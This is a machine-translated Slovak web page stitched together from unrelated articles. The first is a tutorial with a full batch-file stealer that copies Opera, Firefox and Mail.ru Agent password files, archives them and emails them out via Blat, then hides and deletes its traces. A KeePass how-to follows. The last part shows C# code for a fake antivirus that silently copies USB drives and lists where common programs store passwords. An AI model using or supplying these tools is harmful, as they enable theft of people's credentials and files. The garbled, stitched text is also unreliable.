V tomto článku popíšem, ako rýchlo a bez väčších ťažkostí napíšete a vytvoríte vírus, ktorý ukradne súbory s heslami a všetko pošle do schránky.
Začnime tým, že vírus bude napísaný v bat "e (CMD, môžete použiť základné príkazy), to znamená v obvyklom textový súbor a bude sa vykonávať pomocou štandardného, ​​vstavaného tlmočníka Windows - "príkazového riadku".
Aby ste mohli napísať takýto vírus, potrebujete poznať presné miesto uloženia tých súborov, ktoré ukradne, komponenty Blat, ktoré si môžete stiahnuť z off stránky http://www.blat.net/ alebo z nášho servera, ako ako aj komponent z archivátora WinRaR Rar.exe (zaobídete sa aj bez neho).
Otvorte poznámkový blok a skopírujte doň nasledujúci kód:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r kópia /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" skopírujte /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" skopírujte /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite kópia /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

Nebudem písať veľa zo samotného kódu Batinky.
@echo off - skryje telo zadku (takže to nie je potrebné, ale aj tak)
md %systemroot%\wincs - vytvorí priečinok wincs v systéme Priečinok Windows bez ohľadu na to, na ktorom disku je nainštalovaný alebo ako sa volá.
md %SystemDrive%\pass\ - vytvorí priečinok pass na jednotke, kde je nainštalovaný systém Windows.
md %SystemDrive%\pass\opera\ - vytvorí priečinok Opera, z ktorého pochádzajú wand.dat a cookies4.dat Prehliadač Opera(až 11* verzií, opera ukladá svoje heslá do súboru wand.dat)
md %SystemDrive%\pass\Mozilla\- vytvorí priečinok Mozilla, z ktorého pochádzajú súbory Prehliadač Mozilla(cookies.sqlite ,key3.db ,signons.sqlite ), v ktorých sú uložené heslá.
md %SystemDrive%\pass\MailAgent\- vytvorí zložku MailAgent, do ktorej sa skopírujú súbory obsahujúce históriu korešpondencie a kľúče registra (ukladajúce heslá) z Mail Agenta.
md %SystemDrive%\pass\MailAgent\reg- vytvorí zložku reg
attrib %systemroot%\wincs +h +s +r- umiestni atribúty do priečinka wincs, čím ho skryje z pohľadu.
attrib %SystemDrive%\pass +h +s +r- to isté ako vyššie.
skopírujte /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- skopíruje súbor blat.exe z miesta na stiahnutie do priečinka wincs
skopírujte /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- skopíruje súbor blat.dll z miesta sťahovania do priečinka wincs
skopírujte /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- skopíruje súbor blat.lib z miesta sťahovania do priečinka wincs
CD /D %APPDATA%\Opera\Opera\ - prejde do priečinka opera, kde sa nachádzajú súbory s heslami (nielen) z opery.
skopírujte /y wand.dat %SystemDrive%\pass\opera\wand.dat- skopíruje súbor wand.dat do priečinka opera
skopírujte /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- skopíruje súbor cookie4.dat do priečinka opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exportuje kľúč databázy Registry magent_logins2, kde je uložené heslo, do priečinka reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exportuje kľúč databázy Registry magent_logins3, kde je uložené heslo, do priečinka reg
CD / D %APPDATA% - prejdite do priečinka AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- skopíruje obsah priečinka Mra\Base do priečinka MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- skopíruje súbor ver.txt do priečinka MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- prejdite do priečinka s profilom prehliadača Mozilla
skopírujte /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- skopíruje súbor cookies.sqlite do priečinka Mozilla
skopírujte /y key3.db %SystemDrive%\pass\Mozilla\key3.db- skopíruje súbor key3.db do priečinka Mozilla
skopírujte /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- skopíruje súbor signons.sqlite do priečinka Mozilla
skopírujte /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- skopíruje komponent archivátora WinRar Rar.exe do priečinka pass
del /s /q %SystemRoot%\Rar.exe- odstráni komponent archivátora z priečinka Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archivovať obsah priečinka pass
skopírujte /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar skopírujte vytvorený archív do priečinka wincs
cd %systemroot%\wincs – prejdite do priečinka wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Heslo - pripraví program Blat na odoslanie archívu zadaním údajov na autorizáciu a odoslaním listu. Nezabudnite uviesť svoje údaje z poštovej schránky, z ktorej bude list s archívom odoslaná.
ren *.rar pass.rar - pre prípad, že by sa archív počas procesu nesprávne pomenoval, znova ho premenujeme na pass.rar
%systemroot%\wincs\blat.exe -body Súbory Heslo -to [email protected] -pripojte %systemroot%\wincs\pass.rar- uveďte, na ktorú poštovú adresu bude list zaslaný a odošlite.
rmdir /s /q %SystemDrive%\pass- odstrániť priečinok pass
rmdir /s /q %systemroot%\wincs- odstrániť priečinok wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- odstráňte komponenty Blat z priečinka Windows.
del /s /q %systemroot%\blat.lib- odstráňte komponenty Blat z priečinka Windows.
attrib +a +s +h +r %systemroot%\wind.exe- dávame si atribúty, čím sa skrývame pred očami.
EXIT - dokončite proces batinkovania a ukončite.
cls - vymaže výstup všetkých riadkov v intraperátore.
Skopírované, uložiť ako wind.bat a skompilovať do exe pomocou Netopierie programy do exe konvertora, potom všetko zhromaždíme, to znamená, že vezmeme komponenty programu Blat a komponent archivátora WinRar (môžete si ho stiahnuť) a zlepíme to do jedného spustiteľného súboru alebo s nejakým programom by cesta na uvoľnenie všetkých súborov mala be% SystemRoot% alebo% WindowsDir% alebo %windir% .
Výsledkom je, že dostaneme vírus, ktorý antivírusy nespustia a pošle vám na poštu archív so súbormi Súbory, ktoré prídu na poštu, je možné dešifrovať pomocou obnovy viacerých hesiel, aj keď nie všetky, ale iba prútik .dat z opery a potom, ak nebol aktualizovaný na verziu 11 * Všetky ostatné súbory je možné dešifrovať ich nahradením vlastnými.
Myslím, že toto je koniec, ak máte nejaké otázky, kľudne sa pýtajte.
Ďakujem za pozornosť, všetko najlepšie!
©Swap TheHackWorld.in

Mnoho spoločností, vrátane Sony a Adobe, sa už stalo obeťou hackerov, ktorí ukradli milióny hesiel a iných používateľských údajov. Analýza týchto informácií ukázala, že mnohí používatelia často používajú slabé heslá ako „123456“ alebo rovnaké heslo pre mnohé služby. To značne uľahčuje ich úlohu hackerom a zároveň sa dá pochopiť taká neopatrnosť: kto si dokáže zapamätať viac ako tucet zložitých hesiel?

Jednoduchým riešením by mohol byť papier nalepený pod klávesnicou. Žiadny hacker sa doň nedostane, ale budete musieť neustále sledovať ľudí, ktorí sa nachádzajú v blízkosti vášho počítača. A tento list je k ničomu, ak sa chcete prihlásiť do svojho účtu z počítača niekoho iného.

Bezplatný nástroj KeePass 2 Portable túto dilemu rieši. Na používanie vám postačí USB flash disk s 10 MB voľného miesta, na ktorý si nainštalujete pomocný program. V budúcnosti si budete musieť zapamätať iba jedno heslo - z chránenej oblasti flash disku. V ňom totiž KeePass ukladá prihlasovacie údaje do vašich webových služieb vo forme zakódovanej databanky, chránenej hlavným heslom.

Trójske kone, ktoré kradnú heslá, nebudú môcť nič vyňuchať. A keďže už nemusíte mať na pamäti desiatky hesiel, môžete pre každú webovú službu použiť nové, naozaj silné heslo. Teraz vám podrobne povieme, ako používať KeePass.

Ako to spraviť

1 Nainštalujte trezor s heslom


Nainštalujte trezor s heslom

Vložte USB flash disk do PC, vytvorte na ňom nový priečinok a skopírujte tam obsah archívu so softvérom KeePass. Spustite program KeePass.exe. Po spustení aktivujte automatické vyhľadávanie aktualizácie kliknutím na "Povoliť" vo vyskakovacom okne. Potom zvoľte "Zobraziť | Zmeniť jazyk“ a kliknite na „Získať ďalšie jazyky“.

Stiahnite si súbor v ruskom jazyku zo stránky, ktorá sa otvorí kliknutím na „Russian | 2,25+". Rozbaľte obsah archívu na jednotku USB. Znova kliknite na "Zobraziť | Zmeniť jazyk, vyberte „ruštinu“ a reštartujte KeePass stlačením tlačidla „Áno“.

2 Vytvorte novú databázu hesiel


Vytvorte novú databázu hesiel

Vyberte "Súbor | New" a špecifikujte jednotku USB ako úložisko hesiel. V ďalšom okne vás program vyzve na nastavenie hlavného hesla. Budete ho musieť zadať pri každom spustení KeePass.

3 Aktivujte chránený režim


Aktivujte chránený režim

Ak chcete zabrániť trójskemu koňovi prečítať vaše heslo pre KeePass, mali by ste na jeho zadanie použiť chránený režim programu, podobne ako UAC v systéme Windows 7. Ak to chcete urobiť, v KeePass prejdite do časti „Nástroje | Nastavenia | Zabezpečenie", prejdite do spodnej časti okna a začiarknite políčko vedľa položky "Zadať hlavné heslo v zabezpečenom režime".

4 Naplňte databázu heslami


Naplňte databázu heslami

KeePass dokáže triediť heslá do skupín. Vaša nová banka hesiel má predvolene skupiny ako „OS“ alebo „Internet“. Na vytvorenie nový záznam, vyberte príslušnú skupinu (alebo vytvorte novú), kliknite pravým tlačidlom myši na bielu plochu napravo a potom kliknite na „Pridať položku“.

Vyplňte všetky polia a kliknite na tlačidlo OK. Keďže si už na prihlásenie do každého účtu nemusíte pamätať heslá, môžete si nastaviť nové, zložitejšie, ktoré sa dajú vygenerovať napríklad na passwort-generator.com.

5 Použite automatickú autorizáciu


Ak sa chcete do služby prihlásiť pomocou KeePass, otvorte skupinu, v ktorej je uložené príslušné heslo. Kliknite pravým tlačidlom myši kliknite myšou na príslušnú položku úložiska Heslá KeepPass a z rozbaľovacieho zoznamu vyberte možnosť „Spustiť automatické vytáčanie“. Potom program prenesie vaše údaje do prehliadača a prehliadač otvorí nové okno, v ktorom sa prihlásite do svojho účtu.

Upozorňujeme, že do poľa „URL“ musíte zadať adresu URL, ktorú zvyčajne zadávate v prehliadači na autorizáciu, inak nebude automatické zadávanie hesla cez KeePass fungovať.

6 Rozšírte KeepPass


Rozšírte KeepPass

Ak chcete rozšíriť funkčnosť KeePass, prejdite na "Nástroje | Moduly | Viac modulov“, po ktorej budete presmerovaní na stránku s užitočné rozšírenia(naše odporúčania nájdete v tabuľke vyššie). Teraz kliknutím na názov doplnku si ho stiahnite a rozbaľte na flash disk.

Reštartujte KeePass a prejdite na Nástroje | Moduly. V spodnej časti sa zobrazí zoznam dostupných pluginov (niektoré z nich je možné nakonfigurovať).

Najlepšie rozšírenia pre KeePass

Vybavte svoj trezor heslami pridané vlastnosti, napríklad funkcia Rezervovať kópiu alebo prenos hesla pre mobilné telefóny.

názov

Popis

DataBaseBackup Nastaví ochranu banky heslom v prípade krádeže alebo straty jednotky USB.
Twofish Cipher
KeeAgent Pridáva kódovací algoritmus, ktorý je takmer nemožné prelomiť; všimnite si, že to spôsobí, že KeePass bude bežať pomalšie.
KeyExchanger Pridáva kódovací algoritmus, ktorý je takmer nemožné prelomiť; všimnite si, že to spôsobí, že KeePass bude bežať pomalšie.
KeeForm Kliknutím na tlačidlo otvorí vaše obľúbené stránky a automaticky vyplní vaše prihlasovacie údaje.

Pre obyčajných smrteľníkov je flash disk zariadenie na prenos dokumentov / filmov / fotografií a iných osobných (a niekedy aj veľmi osobných) informácií. Pre hackerov je však flash disk obeťou aj bojovým nástrojom. Dnes vám poviem všetky jemnosti nepostrehnuteľného odvádzania údajov z flash diskov do môjho počítača a tiež vás naučím, ako premeniť neškodné flash disky na programy na zálohovanie hesiel z „veľkého“ počítača.

Pasca na flash disky iných ľudí

Myšlienka programu „Evil Computer“ bude nasledovná. Vyvinieme malý nástroj, ktorý sa bude vydávať za super-mega pokročilý antivírus, ktorého účelom je kvalitatívne odstrániť „nebezpečné“ vírusy z flash diskov. Nikoho neprekvapíte vírusom infikovaným flash diskom, takže náš špecializovaný „antivírus“ nebude vyvolávať obavy u dôverčivého používateľa. Naopak, po vložení USB flash disku do počítača sa zobrazí správa ako: "Bol zistený vírus. Urobím podrobnú kontrolu všetkých súborov na prítomnosť infikovaných ", - určite počká na dokončenie tejto operácie.

Príprava nástroja

tak napíš užitočný program budeme na teraz módnom C#. Flexibilita jazyka a bohatá funkcionalita platformy .NET vám umožňuje vyvíjať aplikácie rýchlosťou blesku. Presne toto potrebujeme. Zaujíma nás úroda, ktorú môžeme zožať, nie nudný proces kódovania.

Jednou z dôležitých súčastí našej aplikácie bude rozhranie. Čím pevnejšie to urobíte, tým je pravdepodobnejšie, že obeť si úlovok nevšimne a pokojne počká na dokončenie antivírusovej kontroly. Príliš som sa netrápil a na formu čistého projektu som umiestnil iba obrázok a ProgressBar. Môžete sa vyblázniť a vytvoriť ohromujúci dizajn. Odporúčam vám pozrieť sa na dizajn nejakého skutočného antivírusu a navrhnúť si aplikáciu približne v rovnakom štýle.

Stanovili sme si úlohu

Budeme predpokladať, že sme sa rozhodli pre organizačné otázky a algoritmus činnosti, je čas diskutovať o technických nuansách. Takže náš antivírus by mal začať svoju špinavú prácu počas inštalácie flash disku. Raz nový disk sa v systéme objaví, náš program musí určiť jeho písmeno a začať kopírovať.

Predtým, ako som sa zaviazal napísať tento článok, narazil som na zdrojový kód takéhoto programu. Autor príkladu určil prítomnosť jednotky Flash pravidelným vymenovaním všetkých diskov na prítomnosť jednotky typu " vymeniteľné médiá". Najprv som si myslel, že pôjdem rovnakou cestou, ale vnútorný hlas mi naznačil iracionalitu. Po zvážení všetkých „pro“ a všetkých „no a ide sa“ som tento nápad zavrhol a vybral sa na prechádzku na MSND. O päť minút neskôr sa ukázalo, že som to urobil z dobrého dôvodu. Odpoveď sa našla!

Bez WinAPI nikde...

Najúčinnejším spôsobom, ako zistiť pripojenie nového zariadenia (v našom prípade flash diskov), je zachytiť a analyzovať správu WM_DEVICECHANGE. Počas inštalácie zariadenia sa správa odošle do všetkých okien a my ju môžeme jednoducho spracovať v našej aplikácii. Na to stačí opísať funkciu WindowProc. V praxi to vyzerá takto:

LResult CALLBACK WindowProc (HWND hwnd, //identifikátor okna UINT uMsg, //id správy WPARAM wParam, //udalosť, ku ktorej došlo LPARAM lParam //ukazovateľ na štruktúru obsahujúcu údaje)

V tele funkcie je potrebné porovnať hodnotu parametra WParam s ID rôznych udalostí súvisiacich so správou WM_DEVICECHANGE. Pre náš príklad by to boli:

  • DBT_DEVICEARRIVAL – vybavenie pridané
  • DBT_DEVICEREMOVECOMPLETE – Hardvér bol úplne odstránený
  • Dobre, vieme, ako zistiť skutočnosť pripojenia nového zariadenia, ale ako sa uistiť, že ste pripojili USB flash disk? Existuje veľa zariadení pripojiteľných za chodu (hovorím o usb) (tlačiareň, skener, modem atď.). Našťastie je tento problém vyriešený celkom jednoducho. Pomocou parametra LParam môžeme odkazovať na štruktúru _DEV_BROADCAST_HDR, ktorá má pole dbch_devicetype. Tu sa na základe hodnoty tohto poľa vyvodia príslušné závery. Ak sa rovná DEV_DEVTYP_VOLUME, potom je čas radovať sa a tlieskať rukami - je k nám pripojený flash disk!

    Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //veľkosť štruktúry DWORD dbch_devicetype; //Typ zariadenia DWORD dbch_reserved; //Rezervované, nepoužité )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;

    Do nášho pisyuku bol vložený USB flash disk - skúsme zistiť písmeno jednotky, ktoré mu systém priradil. Rovnako ako v "Field of Miracles" to môžete uhádnuť, ale je lepšie vytiahnuť informácie zo štruktúry DEV_BROADCAST_VOLUME.

    Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //veľkosť štruktúry DWORD dbcv_devicetype; //Typ zariadenia DWORD dbcv_reserved; //Rezervované DWORD dbcv_unitmask; //Písmeno jednotky bitová maska, PDCWORD_VOLD_WORD_DWRD_dbcv_devicetype

    Zo všetkých polí v tejto štruktúre nás zaujíma dbcv_unitmask. Všimnite si, že táto vlastnosť obsahuje iba kúsok písmena, nie jeho symbolickú reprezentáciu. Napríklad, ak je hodnota 0, potom písmeno jednotky bude A; ak 1, tak B atď. Pre pohodlie získania symbolického písmena je najlepšie napísať funkciu.

    Ak náš stĺpček čítate už dlhšie a poznáte funkcie API, potom nie je potrebné čítať ďalšiu časť článku. Otvorte editor a začnite vytvárať aplikácie. Popísal som všetky potrebné štruktúry a funkcie; stačí si ich dať dokopy v programe. Rozhodnite sa a začnem sa ponárať najmä do .NET a C #.

    Poďme na .NET "ohm

    Je čas začať trénovať a aplikovať svoje znalosti na jazyk C#. "Čo do pekla? - pýtaš sa. - Polovicu článku som hovoril o WinAPI, ale potom som sa len hlúpo rozhodol zavolať všetky funkcie vo forme natívneho kódu? Kde je udávaná blesková rýchlosť vývoja?

    V niečom máš pravdu. Naša aplikácia bude skutočne využívať funkcie WinAPI (žiadny jednoduchší spôsob), ale sami ich popisovať nebudeme. Mnoho vývojárov čelilo problému určenia flash diskov. V dôsledku týchto šarvátok sa začali objavovať bezplatné triedy pre C #, v ktorých už bola implementovaná všetka potrebná funkcionalita. Musíme len pripojiť takýto prázdny (čítací komponent) k nášmu projektu a zavolať niekoľko metód. Teraz použijeme jednu z týchto tried. Ale znalosť vyššie popísaných štruktúr sa vám pri portovaní tohto programu do Windows API určite bude hodiť.

    Existuje veľa hotových tried, ktoré takéto problémy riešia, ale mne sa najviac páčila verzia Jana Dolinaya. Táto osoba napísala veľmi ľahko použiteľnú a zrozumiteľnú triedu DriveDetector, ktorá dokáže:

  • Zistite, či je pripojený flash disk
  • Definujte požiadavku na odpojenie pripojenej jednotky Flash
  • Zistite, či je blesk vypnutý
  • Získajte písmeno jednotky novo pripojenej jednotky Flash
  • Poskytnite zoznam súborov otvorených z jednotky Flash
  • A čo je najdôležitejšie, práca s touto triedou je mimoriadne jednoduchá – teraz to uvidíte. Pripojenie triedy k vášmu projektu sa vykonáva štandardným spôsobom a nemá zmysel sa tým zaoberať. Prejdime teda k inicializácii. Robí sa to takto:

    FlashDriveDetector = new DriveDetector(); flashDriveDetector.DeviceArrived += new DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += new DriveDetectorEventHandler(OnDriveRemoved);

    Po vytvorení inštancie objektu triedy DriveDetector definujem obsluhu udalostí DevieArrived() a DriveRemoved(). Podľa ich názvu nie je ťažké uhádnuť, za čo môžu. Celý inicializačný kód je najlepšie napísať metódou Form1(). Hlavný kód nášho programu bude v obsluhe udalosti DeviceArrived. Jeho text si môžete pozrieť na bočnom paneli:

    String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(názov_adresára); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += new IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += new CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashkopírka.Prepísať = pravda; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Definovanie ďalších filtrov //.... flashcopier.StartCopy();

    Hneď na začiatku výpisu definujem cestu k priečinku, kde budeme kopírovať obsah flash disku. Skopírujeme do adresára „flash_current date“, ktorý sa nachádza spolu s priečinkom, z ktorého sa naša aplikácia spúšťa - je to pohodlnejšie. Keď som sa rozhodol pre názov priečinka, pokúsim sa ho vytvoriť pomocou funkcie CreateDirectory (). Túto funkciu som napísal len pre pohodlie. Vytvorí inštanciu objektu DirectoryInfo určenú na prácu s adresármi a zavolá jeho metódu Create (), ktorá vytvorí nový priečinok.

    Po vytvorení priečinka môžete kopírovať. Všetky súbory skopírujem pomocou objektu typu xDirectory. Ak napíšete kód z výpisu sami, potom pri pokuse o kompiláciu kompilátor vygeneruje chybu, v ktorej čierne na bielom povie: "Objekt tohto typu nebol nájdený."

    Ide o to, že xDirectory je trieda tretej strany. Kedysi dávno som ho našiel na internete a odvtedy ho často používam vo svojich projektoch. Páči sa mi to, pretože na kopírovanie podpriečinkov stačí zavolať jednu metódu. Okrem toho umožňuje nastaviť filtre.

    Naozaj sa bez toho zaobísť. Vezmeme štandardné triedy, techniku ​​dobre známu všetkým programátorom – rekurziu – a napíšeme niekoľko desiatok riadkov kódu. Bohužiaľ, toto sa mi absolútne nechce. Vo dvore je 21. storočie, musíme optimalizovať naše akcie na maximum a xDirectory nám s tým pomôže.

    Modul s triedou je na našom disku a o účele metód/vlastností/udalostí sa dozviete v príslušnej tabuľke.

    vlastnosti triedy xDirectory

    xDirectory Class Methods

    Skúste spustiť našu aplikáciu a vložte flash disk. Po niekoľkých sekundách (v závislosti od neporiadku vášho flash disku) sa všetok obsah usb disku prenesie do priečinka, z ktorého ste spustili čerstvo upečenú aplikáciu.

    USB grabber

    Teraz uvažujme o inverznom probléme a povedzme si o nuansách vytvárania tzv. zachytávač flash diskov. Princíp tvorby je úplne rovnaký. Musíte napísať jednoduchú aplikáciu, ktorá sa automaticky spustí po inštalácii flash disku.

    V procese práce aplikácia prejde priečinky / kľúče registra, v ktorých obľúbené programy ukladajú uložené heslá, a ak je to možné, skopírujú všetky informácie do jedného zo svojich priečinkov. Aby vaše automatické spustenie nevzbudilo podozrenie u úbohého používateľa, dajte si námahu a starostlivo ho zamaskujte. Napríklad pod spúšťacou ponukou.

    Pravdepodobne viete, že v súčasnosti sú veľmi populárne takzvané prenosné verzie aplikácií, teda programy, ktoré môžu pracovať priamo z flash disku. Toto je najlepší spôsob hry. Navrhnite program v príslušnom štýle a pre dôveryhodnosť prihoďte niekoľko tlačidiel určených na spustenie akýchkoľvek programov. Môj dizajn je zobrazený na obrázku.

    Ako ideme kradnúť?

    Hneď musím povedať, že tu nie je potrebné vykonávať superhackerské akcie. Väčšina programov ukladá osobné údaje do priečinka Documents and Settings\User\Application Data\%ProgramName% alebo do registra. Názov programu znamená akýkoľvek program. Ak sa stretnete s prvou možnosťou, budete musieť použiť už známu triedu xDirectory (alebo štandardné metódy na prácu so súbormi) a skopírovať s ňou všetko, čo potrebujete. V druhom prípade budete musieť pracovať s registrom. Nebudem uvádzať príklad kopírovania súborov (už sme to zvažovali), ale ukážem vám, ako pracovať s registrom pomocou nástrojov .NET (na príklade určenia cesty k priečinku TC):

    RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" softvér\\Ghisler\\ Úplný veliteľ"); kľúč reťazca = (reťazec) readKey.GetValue("InstallDir");

    To je všetko. Už nebude žiadny kód. Tieto znalosti by vám mali stačiť na získanie súborov s cennými informáciami. Aby som to trochu uľahčil, pripravil som zoznam tých naj obľúbené programy a vymaľovali všetky spôsoby, akými ukladajú uložené používateľské dáta.

    Poštový agent

    Messenger z Mail.ru je teraz veľmi populárny medzi obyčajnými smrteľnými používateľmi (najmä medzi ženami). Ciele sú jasné, úlohy sú stanovené, preto nás zaujíma:

  • História. MA ukladá celú históriu korešpondencie používateľa v dokumentoch a nastavení\%User%\Application Data\Mra\base . V základnom priečinku je súbor mra.dbs. Toto je v skutočnosti súbor histórie.
  • Zoznam kontaktov. Zoznam kontaktov sa nachádza v priečinku MRA\%user account%\clist5.txt. Majte na pamäti, že s mail.agent môže pracovať niekoľko používateľov (alebo jeden používateľ môže mať niekoľko účtov). Preto by bolo najrozumnejšie skopírovať všetky priečinky obsahujúce v názve symbol „@“.
  • heslo. Heslo (presnejšie jeho hash) od účtu Používateľ sa nachádza v registri pozdĺž cesty - HKCU\Software\Mail.RU\Agent\magent_logins2\%Account% v parametri ####password.
  • gTalk

    Spoločnosť Google vytvára pohodlné a funkčné produkty, medzi ktorými je klient gabber - gTalk. Dnes gTalk zatiaľ nie je veľmi populárny. Nie je nainštalovaný na každom druhom PC, ale občas sa to predsa len vyskytne a aby sme boli v predmete, je lepšie hneď naučiť náš program získavať heslá aj z tohto messengeru. Heslá pre všetky účty gTalk sú uložené v registri - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . V tejto pobočke sú uvedené všetky účty, do ktorých ste sa kedy prihlásili gTalk. Heslá účtov sú uložené v parameter reťazca pw.

    Úplný veliteľ

    Úplný veliteľ- zďaleka najobľúbenejší Správca súborov. Program obsahuje približne vagón a malý vozík (a rovnaký počet je možné k nemu pripojiť pomocou doplnkových zásuvných modulov). Nás zaujíma len vstavaný FTP klient. Používajú ho mnohí a heslá sa samozrejme ukladajú.

    TC na rozdiel od mnohých iných programov neukladá heslá do registra, ale používa staré dobré ini súbory. Heslá, ako aj všetky potrebné údaje na pripojenie k serverom (ip, port, používateľské meno atď.) Úplný veliteľ ukladá do súboru wcx_ftp.ini, ktorý sa nevinne nachádza v priečinku programu. Cesta k adresáru, kde je nainštalovaný Úplný veliteľ, zistíte z registra. Pozrite sa do vetvy HKEY_CURRENT_USER\Software\Ghisler\Total Commander.

    firefox

    Prehliadač dnes nie je len program na cestovanie po WEBe, ale celok, ktorý okrem rôznych možností uchováva množstvo dôverných informácií. Typickým príkladom sú webové formuláre. 99% moderných stránok vyžaduje registráciu. Zapamätať si a neustále mať na pamäti kombináciu prihlasovacieho mena / hesla pre každú stránku je nereálna úloha, najmä ak ste pokročilý používateľ a surfovanie po internete sa neobmedzuje iba na Odnoklassniki a VKontakte.

    Vývojári uľahčili používateľom život a do programov zabudovali takzvané „úschovne hesiel“. Zaregistroval som sa, prihlásil som sa pod svojím účtom, prikázal prehliadaču, aby si zapamätal prihlasovacie údaje – a zabudol som. Pri ďalšej návšteve zostáva už len vykonať pár kliknutí myšou a už ste na stránke. Keďže prehliadač ukladá heslá, znamená to, že máme možnosť ukradnúť celú jeho databázu.

  • sessionstore.js – súbor obsahuje všetky uložené relácie.
  • signons3.txt - zašifrované heslá (pre tretiu verziu FF).
  • signons.sqlite - SQLite databáza obsahujúca všetky zašifrované heslá.
  • key3.db - databáza obsahujúca kľúče pre certifikáty.
  • Všetky tieto súbory sa nachádzajú v známom Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .

    Opera

    Opera- prehliadač, ktorý je veľmi populárny medzi ruskými používateľmi. Samozrejme, nemôžeme to nechať bez dozoru. Takže s Operou je situácia približne rovnaká ako s FireFoxom. Všetky heslá uložené v prehliadači sú uložené v Document and Settings\%UserName%\Application Data\Opera\profile v súbore wand.dat. Ukazuje sa, že keď je zistená Opera, budeme konať rovnakým spôsobom ako v prípade firefox.

    Skype

    Popularita Skype rastie každým dňom. Mnoho ľudí to nepoužíva ako prostriedok na telefonovanie, ale na banálny pohodlný rozhovor. Všetky dôverné údaje sa podľa očakávania nachádzajú v používateľskom profile (na rovnakom mieste, kde ich ukladá Opera alebo FF). Ak ich chcete „sprivatizovať“, budete musieť skopírovať používateľský profil z Document and Settings\%userName%\Application Data\Skype\ a exportovať vetvu registra - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .

    QIP

    Ako väčšina programov opísaných vyššie, QIP ukladá všetky uložené heslá do Application Data\qip .

    Kopírovanie dokončené

